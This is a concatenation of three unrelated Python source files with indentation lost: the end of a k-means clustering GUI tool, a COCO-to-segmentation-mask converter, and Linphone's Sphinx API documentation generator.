centroids_error = L1_norm(cWXYZ, centroids_new, None) #To determine if centroids needs updating otherwise stop iteration
elif ddlValue_Norm == "L2 Norm":
centroids_error = L2_norm(cWXYZ, centroids_new, None) #To determine if centroids needs updating otherwise stop iteration
print("Centroids error: ")
print(centroids_error)
cWXYZ = centroids_new
iterations += 1
print()
#Sort points according to their clusters
ptsClusters = []
pts = 0
for m in range(k):
temp_pts = []
for y in range(len(pointToCluster)):
if pointToCluster[y][0] == m:
temp_pts.append(pointToCluster[y][1])
ptsClusters.append(temp_pts)
#Plot data points and clusters
fig = plt.figure(figsize=(x_canvasSize,y_canvasSize))
ax = fig.add_subplot(111, projection='3d')
cmap_array = ['Blues_r', 'Greens_r', 'Reds_r', 'Purples_r', 'Greys_r', 'pink_r', 'Oranges_r', 'jet_r', 'copper_r', 'plasma_R'] # initialize cmap for plotting
markers = ["P", "v" , "," , "o" , "^" , "<", ">", ".", "1", "p"] # initialize markers for plotting
#Slice points in specific coordinates (4 columns)
for r in range(k):
print("CLUSTER {0}: {1}".format(r+1, ptsClusters[r])) #len(pointToCluster[:,1][0]
print("Total # of points in cluster {0}: {1}".format(r+1, len(ptsClusters[r])))
w_sliced = []
x_sliced = []
y_sliced = []
z_sliced = []
for g in range(len(ptsClusters[r])):
w_sliced.append(ptsClusters[r][g][0])
x_sliced.append(ptsClusters[r][g][1])
y_sliced.append(ptsClusters[r][g][2])
z_sliced.append(ptsClusters[r][g][3])
#plot data points
img = ax.scatter(w_sliced, x_sliced, y_sliced, c=z_sliced, cmap=cmap_array[r], s=30, marker=markers[r])
#plot k clusters (clusters are ones with bigger sized point)
ax.scatter(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], c=centroids_new[r][3], cmap=cmap_array[r], marker=markers[r], s=200)
ax.set_title("TRAIN (" + ddlValue_Norm + ")", fontsize=40)
colourBar = fig.colorbar(img)
colourBar.set_label('Cluster ' + str(r+1) + "(TRAIN)")
print("Centroid: ")
print(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], centroids_new[r][3])
print("")
#fig.savefig("kmeans.png")
plt.show()
#Output csv file with appended column (classification) - Train
train_fileName = updateCSV(textboxValue_trainDataset, pointToCluster[:,0], data_temp[0:maxDataSize])
#Stop timer (Train)
train_end = time.time()
#Start timer (Test)
test_start = time.time()
#run on Test dataset
test_centroids_error, test_centroids_coordinate, test_pointToCluster, test_fileName, centroids_error_overall = predict(textboxValue_testDataset, centroids_new, ddlValue_Norm, k, x_canvasSize, y_canvasSize, cmap_array, markers)
#Stop timer (Test)
test_end = time.time()
#Write summary to text file and terminal
writeSummary(train_start, train_end, iterations, centroids_new, pointToCluster, numP, ddlValue_Norm, test_centroids_error, test_centroids_coordinate, test_pointToCluster, train_fileName, test_fileName, test_start, test_end, centroids_error_overall, textboxValue_testDataset)
def predict(textboxValue_testDataset, centroids_new, ddlValue_Norm, k, x_canvasSize, y_canvasSize, cmap_array, markers):
#Read csv file
testData = panda.read_csv(textboxValue_testDataset, header=None, usecols=[0,1,2,3])
testData_temp = panda.read_csv(textboxValue_testDataset, header=None) #temp variable for updating csv
w = np.array(testData[:][0])
x = np.array(testData[:][1])
y = np.array(testData[:][2])
z = np.array(testData[:][3])
test_arrayWXYZ = np.array(testData)
#Initialize variables
centroidsW = []
centroidsX = []
centroidsY = []
centroidsZ = []
centW_new = []
centX_new = []
centY_new = []
centZ_new = []
centroids_error_array = []
test_pointToCluster = []
averageW = np.zeros(k)
averageX = np.zeros(k)
averageY = np.zeros(k)
averageZ = np.zeros(k)
numPoints = np.zeros(k)
for i in range(len(w)): #Accumulate averages of coordinates and number of total points
if ddlValue_Norm == "L1 Norm":
dist = L1_norm(test_arrayWXYZ[i], centroids_new, 1) # computes euclidean distance (L1 norm) between each data point(w,x,y,z) and k numbers of initialized centroids. Returns an array of k numbers of euclidean distance eg. [5.59642743 5.97662112 3.4525353]
elif ddlValue_Norm == "L2 Norm":
dist = L2_norm(test_arrayWXYZ[i], centroids_new, 1) # computes euclidean distance (L2 norm) between each data point(w,x,y,z) and k numbers of initialized centroids. Returns an array of k numbers of euclidean distance eg. [5.59642743 5.97662112 3.4525353]
test_pointToCluster.append((np.argmin(dist), test_arrayWXYZ[i])) # gets index of computed euclidean distance with minimum/shortest value (eg. among [5.59642743 5.97662112 3.4525353]) and associated coordinates of w,x,y,z and append to array
#print("--test_pointToCluster-- ")
#for p in range(len(test_pointToCluster)):
# print("test_pointToCluster [{0}]: {1}".format(p, test_pointToCluster[p]))
averageW[np.argmin(dist)] += test_arrayWXYZ[i][0]
averageX[np.argmin(dist)] += test_arrayWXYZ[i][1]
averageY[np.argmin(dist)] += test_arrayWXYZ[i][2]
averageZ[np.argmin(dist)] += test_arrayWXYZ[i][3]
numPoints[np.argmin(dist)] += int(1)
test_pointToCluster = np.array(test_pointToCluster)
print("-"*20 + " PREDICT " + "-"*20)
print("averageW: {0}".format(averageW))
print("averageX: {0}".format(averageX))
print("averageY: {0}".format(averageY))
print("averageZ: {0}".format(averageZ))
print("numPoints: {0}".format(numPoints))
print("")
centW_new, centX_new, centY_new, centZ_new = updateCentroids(averageW, averageX, averageY, averageZ, numPoints)
test_centroids = np.array(list(zip(centW_new, centX_new, centY_new, centZ_new)))
print("Predicted Centroids: ")
print(centroids_new)
print("Test Centroids: ")
print(test_centroids)
print("-"*50)
for i in range(k):
#Validation check - Centroids error
if ddlValue_Norm == "L1 Norm":
print("centroids_new[{0}]: {1}".format(i+1, centroids_new[i]))
print("test_centroids[{0}]: {1}".format(i+1, test_centroids[i]))
centroids_error = L1_norm(centroids_new[i], test_centroids[i], None) #To determine if centroids needs updating otherwise stop iteration
elif ddlValue_Norm == "L2 Norm":
print("centroids_new[{0}]: {1}".format(i+1, centroids_new[i]))
print("test_centroids[{0}]: {1}".format(i+1, test_centroids[i]))
centroids_error = L2_norm(centroids_new[i], test_centroids[i], None) #To determine if centroids needs updating otherwise stop iteration
print("Centroids error: ")
print(centroids_error)
centroids_error_array.append(centroids_error)
centroids_error_overall = L2_norm(centroids_new, test_centroids, None) #To determine if centroids needs updating otherwise stop iteration
#Save CSV file
test_fileName = updateCSV(textboxValue_testDataset, test_pointToCluster[:,0], testData_temp)
#----------------------------------------PLOT FIGURE----------------------------------------
#Sort points according to their clusters
test_ptsClusters = []
pts = 0
for m in range(k):
temp_pts = []
for y in range(len(test_pointToCluster)):
if test_pointToCluster[y][0] == m:
temp_pts.append(test_pointToCluster[y][1])
test_ptsClusters.append(temp_pts)
#Plot data points and clusters
fig = plt.figure(figsize=(x_canvasSize,y_canvasSize))
ax = fig.add_subplot(111, projection='3d')
cmap_array = cmap_array # initialize cmap for plotting
markers = markers # initialize markers for plotting
#Slice points in specific coordinates (4 columns)
print("="*20 + " TEST " + "="*20)
for r in range(k):
print("CLUSTER {0}: {1}".format(r+1, test_ptsClusters[r]))
print("Total # of points in cluster {0}: {1}".format(r+1, len(test_ptsClusters[r])))
w_sliced = []
x_sliced = []
y_sliced = []
z_sliced = []
for g in range(len(test_ptsClusters[r])):
w_sliced.append(test_ptsClusters[r][g][0])
x_sliced.append(test_ptsClusters[r][g][1])
y_sliced.append(test_ptsClusters[r][g][2])
z_sliced.append(test_ptsClusters[r][g][3])
#plot data points
img = ax.scatter(w_sliced, x_sliced, y_sliced, c=z_sliced, cmap=cmap_array[r], s=30, marker=markers[r])
#plot k clusters (clusters are ones with bigger sized point)
ax.scatter(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], c=centroids_new[r][3], cmap=cmap_array[r], marker=markers[r], s=200)
ax.set_title("TEST (" + ddlValue_Norm + ")", fontsize=40)
colourBar = fig.colorbar(img)
colourBar.set_label('Cluster ' + str(r+1) + " (TEST)")
print("Centroid: ")
print(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], centroids_new[r][3])
print("")
plt.show()
return np.array(centroids_error_array), test_centroids, test_pointToCluster, test_fileName, centroids_error_overall
def updateCSV(csv, content, csv_pd):
fileName = os.path.basename(csv)
savePath = os.path.dirname(csv)
file, ext = fileName.split(".")
fileName_new = savePath + "\\output_" + file + "." + ext
csv_pd[len(csv_pd.columns)] = content
csv_pd.to_csv(fileName_new, index = False, header=False)
print("=================SAVED FILE=================")
print("Filename: {0}".format(fileName_new))
print("============================================")
return fileName_new
def messageBox(title, text, style):
return ctypes.windll.user32.MessageBoxW(0, text, title, style)
def get_sublists(original_list, number_of_sub_list_wanted):
sublists = list()
for sub_list_count in range(number_of_sub_list_wanted):
sublists.append(original_list[sub_list_count::number_of_sub_list_wanted])
return sublists
def initializeCentroids(centroidsW, centroidsX, centroidsY, centroidsZ, w, x, y, z, k):
centroidsW = np.array(np.random.randint(0, np.amax(w), size=k)) #gets k random numbers(between 0 and max/highest number in coordinate w) to initialize centroids for coordinate w
centroidsX = np.array(np.random.randint(0, np.amax(x), size=k)) #gets k random numbers(between 0 and max/highest number in coordinate w) to initialize centroids for coordinate x
centroidsY = np.array(np.random.randint(0, np.amax(y), size=k)) #gets k random numbers(between 0 and max/highest number in coordinate w) to initialize centroids for coordinate y
centroidsZ = np.array(np.random.randint(0, np.amax(z), size=k)) #gets k random numbers(between 0 and max/highest number in coordinate w) to initialize centroids for coordinate z
cWXYZ = np.array(list(zip(centroidsW, centroidsX, centroidsY, centroidsZ))) #Merge centroids coordinate w,x,y,z into list
"""
print("")
print("Initialize Centroids: ")
print(cWXYZ)
"""
return cWXYZ, centroidsW, centroidsX, centroidsY, centroidsZ
def writeSummary(start, end, iterations, centroids_new, pointToCluster, numP, ddlValue_Norm, test_centroids_error, test_centroids_coordinate, test_pointToCluster, train_fileName, test_fileName, test_start, test_end, centroids_error_overall, textboxValue_testDataset):
#Write to kmeans.txt file
savePath = os.path.dirname(textboxValue_testDataset)
f = open(savePath + "\\kmeans.txt","w+")
f.write("=================TRAIN=================\n")
f.write("Time taken (s): ")
f.write(str(end - start))
f.write("\n")
f.write("Iterations: " + str(iterations))
f.write("\n")
f.write("Norm: {0}".format(ddlValue_Norm))
f.write("\n")
f.write("Output file: ")
f.write(train_fileName)
f.write("\n")
#output summary to command line
print("=================TRAIN=================")
print("Time taken (s): {0}".format((end - start)))
print("Iterations: " + str(iterations))
print("Norm: {0}".format(ddlValue_Norm))
print("Output file: {0}".format(train_fileName))
print("Latest Centroids: ")
#Centroids Predicted
f.write("Centroids (Predicted): \n")
for i in range(len(centroids_new)):
print("Centroid (Predicted) " + str(i+1) + " = " + str(centroids_new[i][0]) + ", " + str(centroids_new[i][1]) + ", " + str(centroids_new[i][2]) + ", " + str(centroids_new[i][3]))
f.write("Centroid " + str(i+1) + " = ")
f.write(str(centroids_new[i][0]))
f.write(", ")
f.write(str(centroids_new[i][1]))
f.write(", ")
f.write(str(centroids_new[i][2]))
f.write(", ")
f.write(str(centroids_new[i][3]))
f.write("\n")
#Number of points
print("Number of points: ")
print(str(numP) + " #" + str(np.sum(numP)))
f.write("Number of points: ")
f.write(str(numP) + " #" + str(np.sum(numP)))
f.write("\n")
print("Centroids (Cluster - Points): --Please refer to the save file named kmeans.txt--")
print("=====================================")
f.write("Centroid (Cluster - Points): \n")
for i in range(len(pointToCluster)):
f.write(str(pointToCluster[i][0]))
f.write(" - ")
f.write(str(pointToCluster[i][1][0]))
f.write(", ")
f.write(str(pointToCluster[i][1][1]))
f.write(", ")
f.write(str(pointToCluster[i][1][2]))
f.write(", ")
f.write(str(pointToCluster[i][1][3]))
f.write("\n")
f.write("======================================")
f.write("\n=================TEST=================\n")
f.write("Time taken (s): ")
f.write(str(test_end - test_start))
f.write("\n")
f.write("Norm: {0}".format(ddlValue_Norm))
f.write("\n")
f.write("Number of points: ")
f.write(str(len(test_pointToCluster)))
f.write("\n")
f.write("Output file: ")
f.write(test_fileName)
f.write("\n")
#output summary to command line
print("=================TEST=================")
print("Time taken (s): {0}".format((test_end - test_start)))
print("Norm: {0}".format(ddlValue_Norm))
print("Number of points: {0}".format(len(test_pointToCluster)))
print("Output file: {0}".format(test_fileName))
#Centroids Predicted
f.write("Centroids (Predicted): \n")
for i in range(len(centroids_new)):
print("Centroid (Predicted)" + str(i+1) + " = " + str(centroids_new[i][0]) + ", " + str(centroids_new[i][1]) + ", " + str(centroids_new[i][2]) + ", " + str(centroids_new[i][3]))
f.write("Centroid " + str(i+1) + " = ")
f.write(str(centroids_new[i][0]))
f.write(", ")
f.write(str(centroids_new[i][1]))
f.write(", ")
f.write(str(centroids_new[i][2]))
f.write(", ")
f.write(str(centroids_new[i][3]))
f.write("\n")
#Centroids Test
f.write("Centroids (Test): \n")
for j in range(len(centroids_new)):
print("Centroid (Test)" + str(j+1) + " = " + str(test_centroids_coordinate[j][0]) + ", " + str(test_centroids_coordinate[j][1]) + ", " + str(test_centroids_coordinate[j][2]) + ", " + str(test_centroids_coordinate[j][3]))
f.write("Centroid " + str(j+1) + " = ")
f.write(str(test_centroids_coordinate[j][0]))
f.write(", ")
f.write(str(test_centroids_coordinate[j][1]))
f.write(", ")
f.write(str(test_centroids_coordinate[j][2]))
f.write(", ")
f.write(str(test_centroids_coordinate[j][3]))
f.write("\n")
#Centroids Error
f.write("Centroid Errors: \n")
for j in range(len(test_centroids_error)):
print("Centroid (Error)" + str(j+1) + " = " + str(test_centroids_error[j]) + ", " + str(test_centroids_error[j]) + ", " + str(test_centroids_error[j]))
f.write("Centroid " + str(j+1) + " = ")
f.write(str(test_centroids_error[j]))
f.write("\n")
f.write("Accuracy: {0}%".format(round((1-(np.sum(test_centroids_error)/len(test_centroids_error)))*100, 2))) #centroids_error_overall
f.write("\n")
print("Accuracy: {0}%".format((round((1-(np.sum(test_centroids_error)/len(test_centroids_error)))*100, 2)))) #centroids_error_overall
print("Centroids (Cluster - Points): --Please refer to the save file named kmeans.txt--")
print("==================================")
f.write("Centroid (Cluster - Points): \n")
for i in range(len(test_pointToCluster)):
f.write(str(test_pointToCluster[i][0]))
f.write(" - ")
f.write(str(test_pointToCluster[i][1][0]))
f.write(", ")
f.write(str(test_pointToCluster[i][1][1]))
f.write(", ")
f.write(str(test_pointToCluster[i][1][2]))
f.write(", ")
f.write(str(test_pointToCluster[i][1][3]))
f.write("\n")
f.write("=====================================")
f.close()
def updateCentroids(cw, cx, cy, cz, p):
for a in range(len(cw)):
cw[a] = cw[a]/p[a]
cx[a] = cx[a]/p[a]
cy[a] = cy[a]/p[a]
cz[a] = cz[a]/p[a]
return cw, cx, cy, cz
def L1_norm(p1, p2, axisParam):
L1 = np.sum(abs(p1-p2), axis=axisParam)
return L1
def L2_norm(p1, p2, axisParam):
l2 = np.sqrt(np.sum(np.power((p1 - p2),2), axis=axisParam))
return l2
def eudistance(p1,p2, axisParam):
return np.linalg.norm((p1-p2), axis=axisParam)
def main():
app = QApplication(sys.argv)
mainWindow = MainWindow()
sys.exit(app.exec_())
if __name__ == '__main__':
main() |
# -*- coding: utf-8 -*-
"""
@author: LiuXin
@contact: <EMAIL>
@Created on: 2020/8/4 下午1:56
"""
from pycocotools.coco import COCO
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import os,shutil,cv2
from dataloader.skmt import SkmtDataSet
def resave_img(img_name,output_path,prefix):
'''
Args:
img_name: the img_name containing path
output_path:
prefix: some info to distinguish img
Returns:
'''
name_splits=img_name.split('/')
img=Image.open(img_name)
if img.mode != 'RGB':
img=img.convert('RGB')
img.save(os.path.join(output_path,'JPEGImages',prefix+name_splits[-1]))
# shutil.copyfile(img_name,os.path.join(output_path,'JPEGImages',prefix+name_splits[-1]))
def get_mask(coco,anns,file_name,prefix=None):
'''read img file and construct a (w,h) seg_mask according to the anns
Args:
anns(list[dict]): the anns of one img
input_root:
img_info(dict):
eg: {'id': 1, 'license': 0, 'file_name': '1.jpg',...,'width': 755}
Returns:
seg_map(np.array(w,h)):the map of class_id
'''
img = Image.open(file_name)
seg_mask = np.zeros((img.size[1], img.size[0]), dtype=np.int)
for ann in anns:
mask = coco.annToMask(ann)
#TODO:屏蔽掉不需要的类
if(ann['category_id']>=SkmtDataSet.NUM_CLASSES):
ann['category_id']=0
seg_mask[np.where(mask)]=ann['category_id']
# return mask
seg_map = Image.fromarray(seg_mask.astype('uint8')).convert('P')
return seg_map
def ann_to_segmap(coco,input_root,output_root,prefix):
'''
get anns of each img and build a seg_map ,and save it to the seg_map_path
Args:
coco(COCO): obj of coco
input_root:
output_root:
prefix: the prefix of newname for images,ig:Shoulder11_200812_1.jpg
Returns:
None
'''
imgIds = coco.getImgIds()
img_infos = coco.loadImgs(imgIds)
img_path =os.path.join(input_root,'images')
seg_map_path=os.path.join(output_root,'SegmentationClass')
#加载所有图片
for index,img_info in enumerate(img_infos):
annIds = coco.getAnnIds(imgIds=img_info['id'], iscrowd=None)
anns = coco.loadAnns(annIds)
file_name=os.path.join(img_path,img_info['file_name'])
seg_map=get_mask(coco,anns,file_name)
#添加文件名前缀并保存分割图
if prefix:
resave_img(file_name,output_root,prefix)
seg_map.save(os.path.join(seg_map_path,prefix+img_info['file_name'].replace('jpg','png')))
return None
def visualize_map_img(img_path,seg_map_path):
'''visualize the seg map by rgb picture
Returns:
None
'''
img_files=os.listdir(seg_map_path)
for file in img_files:
mask=Image.open(os.path.join(seg_map_path,file))
img=Image.open(os.path.join(img_path,file.replace('png','jpg')))
label_mask=np.array(mask)
r = label_mask.copy()
g = label_mask.copy()
b = label_mask.copy()
for ll in range(0, np.max(label_mask)+1):
r[label_mask == ll] = SkmtDataSet.PALETTE[ll][ 0]
g[label_mask == ll] = SkmtDataSet.PALETTE[ll][1]
b[label_mask == ll] = SkmtDataSet.PALETTE[ll][2]
rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))
rgb[:, :, 0] = r / 255.0
rgb[:, :, 1] = g / 255.0
rgb[:, :, 2] = b / 255.0
#plot img
plt.figure(figsize=(200,100))
plt.subplot(1, 2, 1)
plt.imshow(img)
plt.subplot(1, 2, 2)
plt.imshow(rgb)
plt.show()
if __name__ =='__main__':
img_path='/home/liuxin/Documents/CV/dataset/SKMT/Seg/JPEGImages'
seg_map_path='/home/liuxin/Documents/CV/dataset/SKMT/Seg/SegmentationClass'
visualize_map_img(img_path,seg_map_path) |
<reponame>hihi-dev/linphone<filename>coreapi/help/doc/sphinx/gendoc.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2017 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import hashlib
import logging
import os
import pystache
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', '..', '..', 'tools'))
import abstractapi
import genapixml as capi
import metaname
import metadoc
def md5sum(file):
hasher = hashlib.md5()
with open(file, mode='rb') as f:
hasher.update(f.read())
return hasher.hexdigest()
class RstTools:
@staticmethod
def make_part(text):
return RstTools.make_section(text, char='#', overline=True)
@staticmethod
def make_chapter(text):
return RstTools.make_section(text, char='*', overline=True)
@staticmethod
def make_section(text, char='=', overline=False):
size = len(text)
underline = (char*size)
lines = [text, underline]
if overline:
lines.insert(0, underline)
return '\n'.join(lines)
@staticmethod
def make_subsection(text):
return RstTools.make_section(text, char='-')
@staticmethod
def make_subsubsection(text):
return RstTools.make_section(text, char='^')
class Table:
def __init__(self):
self._rows = []
@property
def rows(self):
return self._rows
class CSVTable(Table):
def addrow(self, row):
self._rows.append(', '.join([self._format_cell(cell) for cell in row]))
def __str__(self):
return '.. csv-table::\n\t\n\t' + '\n\t'.join(self._rows)
def _format_cell(self, cell):
return '"{0}"'.format(cell.replace('"', '""'))
class GridTable(Table):
def __init__(self):
RstTools.Table.__init__(self)
self._widths = []
self._heights = []
def addrow(self, row):
if len(self._widths) == 0:
self._widths.append(0)
self._widths *= len(row)
elif len(row) != len(self._widths):
raise ValueError('row width mismatch table width')
height = 0
row2 = []
i = 0
while i<len(row):
lines = str(row[i]).split(sep='\n')
row2.append(lines)
width = len(max(lines, key=len))
self._widths[i] = max(self._widths[i], width)
height = max(height, len(lines))
i += 1
self._rows.append(row2)
self._heights.append(height)
def _make_hline(self):
res = '+'
for width in self._widths:
res += ('-' * (width+2))
res += '+'
res += '\n'
return res
def _make_row(self, idx):
res = ''
row = self._rows[idx]
j = 0
while j < self._heights[idx]:
res += '|'
i = 0
while i < len(row):
line = row[i][j] if j < len(row[i]) else ''
res += ' {0} '.format(line)
res += (' ' * (self._widths[i]-len(line)))
res += '|'
i += 1
res += '\n'
j += 1
return res
def __str__(self):
if len(self._rows) == 0 or len(self._widths) == 0:
return ''
else:
res = self._make_hline()
i = 0
while i<len(self._rows):
res += self._make_row(i)
res += self._make_hline()
i += 1
return res
class LangInfo:
def __init__(self, langCode):
if langCode not in LangInfo._displayNames:
raise ValueError("Invalid language code '{0}'".format(langCode))
self.langCode = langCode
self.nameTranslator = metaname.Translator.get(langCode)
self.langTranslator = abstractapi.Translator.get(langCode)
self.docTranslator = metadoc.SphinxTranslator(langCode)
@property
def displayName(self):
return LangInfo._displayNames[self.langCode]
@property
def directory(self):
return self.langCode.lower()
_displayNames = {
'C' : 'C',
'Cpp' : 'C++',
'Java' : 'Java',
'CSharp': 'C#'
}
class SphinxPart(object):
def __init__(self, lang, langs):
object.__init__(self)
self.lang = lang
self.langs = langs
@property
def language(self):
return self.lang.displayName
@property
def docTranslator(self):
return self.lang.docTranslator
@property
def hasNamespaceDeclarator(self):
return ('namespaceDeclarator' in dir(self.docTranslator))
@property
def isJava(self):
return self.lang.langCode == 'Java'
@property
def isNotJava(self):
return not self.isJava
def make_part(self):
return lambda text: RstTools.make_part(pystache.render(text, self))
def make_chapter(self):
return lambda text: RstTools.make_chapter(pystache.render(text, self))
def make_section(self):
return lambda text: RstTools.make_section(pystache.render(text, self))
def make_subsection(self):
return lambda text: RstTools.make_subsection(pystache.render(text, self))
def make_subsection(self):
return lambda text: RstTools.make_subsubsection(pystache.render(text, self))
def write_declarator(self):
return lambda text: self.docTranslator.get_declarator(text)
def _make_selector(self, obj):
links = []
for lang in self.langs:
if lang is self.lang:
link = lang.displayName
else:
if lang.langCode == 'Java' and type(obj) is abstractapi.Enumerator:
ref = metadoc.Reference.make_ref_from_object(None, obj.parent)
else:
ref = metadoc.Reference.make_ref_from_object(None, obj)
link = ref.translate(lang.docTranslator, label=lang.displayName)
links.append(link)
return ' '.join(links)
class EnumPart(SphinxPart):
def __init__(self, enum, lang, langs, namespace=None):
SphinxPart.__init__(self, lang, langs)
self.name = enum.name.translate(self.lang.nameTranslator)
self.fullName = enum.name.translate(self.lang.nameTranslator, recursive=True)
self.briefDesc = enum.briefDescription.translate(self.docTranslator)
self.enumerators = [self._translate_enumerator(enumerator) for enumerator in enum.enumerators]
self.selector = self._make_selector(enum)
self.sectionName = RstTools.make_section(self.name)
self.declaration = 'public enum {0}'.format(self.name) if self.lang.langCode == 'Java' else self.name
ref = metadoc.ClassReference(None)
ref.relatedObject = enum
self.link = ref.translate(lang.docTranslator)
def _translate_enumerator(self, enumerator):
return {
'name' : enumerator.name.translate(self.lang.nameTranslator),
'briefDesc' : enumerator.briefDescription.translate(self.docTranslator),
'value' : enumerator.translate_value(self.lang.langTranslator),
'selector' : self._make_selector(enumerator)
}
class SphinxPage(SphinxPart):
def __init__(self, lang, langs, filename):
SphinxPart.__init__(self, lang, langs)
self.filename = filename
def write(self, directory):
r = pystache.Renderer()
filepath = os.path.join(directory, self.filename)
tmpFilepath = filepath + '.tmp'
with open(tmpFilepath, mode='w') as f:
f.write(r.render(self))
if os.path.exists(filepath) and md5sum(filepath) == md5sum(tmpFilepath):
os.remove(tmpFilepath)
else:
os.rename(tmpFilepath, filepath)
return filepath
def _get_translated_namespace(self, obj):
namespace = obj.find_first_ancestor_by_type(abstractapi.Namespace)
return namespace.name.translate(self.lang.nameTranslator, recursive=True)
@staticmethod
def _classname_to_filename(classname):
return classname.to_snake_case(fullName=True) + '.rst'
class IndexPage(SphinxPage):
def __init__(self, lang, filename):
SphinxPage.__init__(self, lang, None, filename)
self._entries = []
self._sorted = True
@property
def title(self):
return RstTools.make_chapter("{0} API".format(self.lang.displayName))
@property
def dir(self):
return self.lang.directory
@property
def entries(self):
if not self._sorted:
self._entries.sort(key=lambda x: x['filename'])
self._sorted = True
return self._entries
def add_entry(self, filename):
self.entries.append({'filename': filename})
self._sorted = False
class EnumPage(SphinxPage):
def __init__(self, enum, lang, langs):
filename = SphinxPage._classname_to_filename(enum.name)
SphinxPage.__init__(self, lang, langs, filename)
namespace = enum.find_first_ancestor_by_type(abstractapi.Namespace)
self.namespace = namespace.name.translate(lang.nameTranslator) if lang.langCode != 'C' else None
self.enum = EnumPart(enum, lang, langs, namespace=namespace)
class ClassPage(SphinxPage):
def __init__(self, _class, lang, langs):
filename = SphinxPage._classname_to_filename(_class.name)
SphinxPage.__init__(self, lang, langs, filename)
namespace = _class.find_first_ancestor_by_type(abstractapi.Namespace)
self.namespace = namespace.name.translate(self.lang.nameTranslator, recursive=True)
self.className = _class.name.translate(self.lang.nameTranslator)
self.fullClassName = _class.name.translate(self.lang.nameTranslator, recursive=True)
self.briefDoc = _class.briefDescription.translate(self.docTranslator)
self.detailedDoc = _class.detailedDescription.translate(self.docTranslator) if _class.detailedDescription is not None else None
self.enums = [EnumPart(enum, lang, langs) for enum in _class.enums]
self.properties = self._translate_properties(_class.properties) if isinstance(_class, abstractapi.Class) else []
self.methods = self._translate_methods(_class.instanceMethods)
self.classMethods = self._translate_methods(_class.classMethods)
self.selector = self._make_selector(_class)
@property
def classDeclaration(self):
return 'public interface {0}'.format(self.className) if self.lang.langCode == 'Java' else self.className
@property
def hasMethods(self):
return len(self.methods) > 0
@property
def hasClassMethods(self):
return len(self.classMethods) > 0
@property
def hasProperties(self):
return len(self.properties) > 0
@property
def hasEnums(self):
return len(self.enums) > 0
def _translate_properties(self, properties):
translatedProperties = []
for property_ in properties:
propertyAttr = {
'name' : property_.name.translate(self.lang.nameTranslator),
'getter' : self._translate_method(property_.getter) if property_.getter is not None else None,
'setter' : self._translate_method(property_.setter) if property_.setter is not None else None
}
propertyAttr['title'] = RstTools.make_subsubsection(propertyAttr['name'])
propertyAttr['ref_label'] = (self.lang.langCode + '_')
propertyAttr['ref_label'] += (property_.getter.name.to_snake_case(fullName=True) if property_.getter is not None else property_.setter.name.to_snake_case(fullName=True))
translatedProperties.append(propertyAttr)
return translatedProperties
def _translate_methods(self, methods):
translatedMethods = []
for method in methods:
translatedMethods.append(self._translate_method(method))
return translatedMethods
def _translate_method(self, method):
namespace = method.find_first_ancestor_by_type(abstractapi.Class,abstractapi.Interface)
methAttr = {
'prototype' : method.translate_as_prototype(self.lang.langTranslator, namespace=namespace),
'briefDoc' : method.briefDescription.translate(self.docTranslator),
'detailedDoc' : method.detailedDescription.translate(self.docTranslator),
'selector' : self._make_selector(method)
}
reference = metadoc.FunctionReference(None)
reference.relatedObject = method
methAttr['link'] = reference.translate(self.lang.docTranslator, namespace=method.find_first_ancestor_by_type(abstractapi.Class, abstractapi.Interface))
return methAttr
@property
def enumsSummary(self):
table = RstTools.CSVTable()
for enum in self.enums:
briefDoc = ' '.join([line['line'] for line in enum.briefDesc['lines']])
table.addrow((enum.link, briefDoc))
return table
@property
def propertiesSummary(self):
table = RstTools.CSVTable()
for property_ in self.properties:
reference = ':ref:`{0}`'.format(property_['ref_label'])
briefDoc = property_['getter']['briefDoc'] if property_['getter'] is not None else property_['setter']['briefDoc']
briefDoc = ' '.join([line['line'] for line in briefDoc['lines']])
table.addrow([reference, briefDoc])
return table
@property
def instanceMethodsSummary(self):
table = RstTools.CSVTable()
for method in self.methods:
briefDoc = ' '.join([line['line'] for line in method['briefDoc']['lines']])
table.addrow([method['link'], briefDoc])
return table
@property
def classMethodsSummary(self):
table = RstTools.CSVTable()
for method in self.classMethods:
briefDoc = ' '.join([line['line'] for line in method['briefDoc']['lines']])
table.addrow([method['link'], briefDoc])
return table
class OldFilesCleaner:
def __init__(self, rootDirectory):
self._filesToKeep = set()
self.root = rootDirectory
def protect_file(self, directory):
self._filesToKeep.add(directory)
def clean(self):
self._clean(self.root)
def _clean(self, dir_):
if os.path.isdir(dir_):
for filename in os.listdir(dir_):
self._clean(os.path.join(dir_, filename))
elif dir_ not in self._filesToKeep:
os.remove(dir_)
class DocGenerator:
def __init__(self, api):
self.api = api
self.languages = [
LangInfo('C'),
LangInfo('Cpp'),
LangInfo('Java'),
LangInfo('CSharp')
]
def generate(self, outputdir):
for lang in self.languages:
directory = os.path.join(args.outputdir, lang.directory)
cleaner = OldFilesCleaner(directory)
indexPage = IndexPage(lang, 'index.rst')
if not os.path.exists(directory):
os.mkdir(directory)
for enum in self.api.namespace.enums:
page = EnumPage(enum, lang, self.languages)
filepath = page.write(directory)
indexPage.add_entry(page.filename)
cleaner.protect_file(filepath)
for class_ in (self.api.namespace.classes + self.api.namespace.interfaces):
page = ClassPage(class_, lang, self.languages)
filepath = page.write(directory)
indexPage.add_entry(page.filename)
cleaner.protect_file(filepath)
filepath = indexPage.write(directory)
cleaner.protect_file(filepath)
cleaner.clean()
if __name__ == '__main__':
argparser = argparse.ArgumentParser(description='Generate a sphinx project to generate the documentation of Linphone Core API.')
argparser.add_argument('xmldir', type=str, help='directory holding the XML documentation of the C API generated by Doxygen')
